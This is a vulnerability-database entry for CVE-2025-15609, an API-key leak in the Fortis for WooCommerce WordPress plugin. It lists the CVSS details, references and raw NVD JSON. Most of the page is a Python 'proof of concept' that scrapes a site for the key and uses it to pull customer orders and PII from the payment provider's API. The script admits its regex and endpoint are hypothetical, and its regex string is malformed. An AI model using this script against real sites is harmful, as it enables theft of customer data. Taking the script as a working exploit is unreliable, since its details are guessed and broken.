CVE-2025-15609

Description

The Fortis for WooCommerce WordPress plugin before 1.3.1 may leak sensitive API keys to unauthenticated attackers, allowing them to query Fortis' API and retrieve sensitive customer information, like past orders, PII, etc.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Fortis for WooCommerce < 1.3.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Proof of Concept for CVE-2025-15609
# This script demonstrates how an attacker might extract an exposed API key and query data.

import requests
import re

target_url = "http://target-wordpress-site.com"

# Step 1: Fetch the main page or specific JS file to find the API key
response = requests.get(target_url)

# Hypothetical regex pattern to find the Fortis API Key (adjust based on actual implementation)
# Pattern looks for 'api_key' or similar variable assignments
api_key_pattern = r"api_key['"][\s:=]['"]([a-zA-Z0-9]{32,})['"]"
match = re.search(api_key_pattern, response.text)

if match:
    leaked_key = match.group(1)
    print(f"[+] API Key found: {leaked_key}")

    # Step 2: Use the leaked key to query Fortis API (Hypothetical Endpoint)
    fortis_api_url = "https://api.fortis-service.com/v1/customer_data"
    headers = {
        "Authorization": f"Bearer {leaked_key}",
        "User-Agent": "CVE-2025-15609-Scanner"
    }

    data_response = requests.get(fortis_api_url, headers=headers)

    if data_response.status_code == 200:
        print("[+] Successfully retrieved sensitive data:")
        print(data_response.json())
    else:
        print(f"[-] API request failed with status: {data_response.status_code}")
else:
    print("[-] API Key not found in the response.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15609
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15609
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15609/
[4] VulDB https://vuldb.com/cve/CVE-2025-15609
[5] https://wpscan.com/vulnerability/220f72ea-e3b4-44c9-8c9b-15662aebb6cb/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15609", "sourceIdentifier": "[email protected]", "published": "2026-05-19T07:16:29.327", "lastModified": "2026-05-19T14:38:39.660", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Fortis for WooCommerce WordPress plugin before 1.3.1 may leak sensitive API keys to unauthenticated attackers, allowing them to query Fortis' API and retrieve sensitive customer information, like past orders, PII, etc."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "references": [{"url": "https://wpscan.com/vulnerability/220f72ea-e3b4-44c9-8c9b-15662aebb6cb/", "source": "[email protected]"}]}}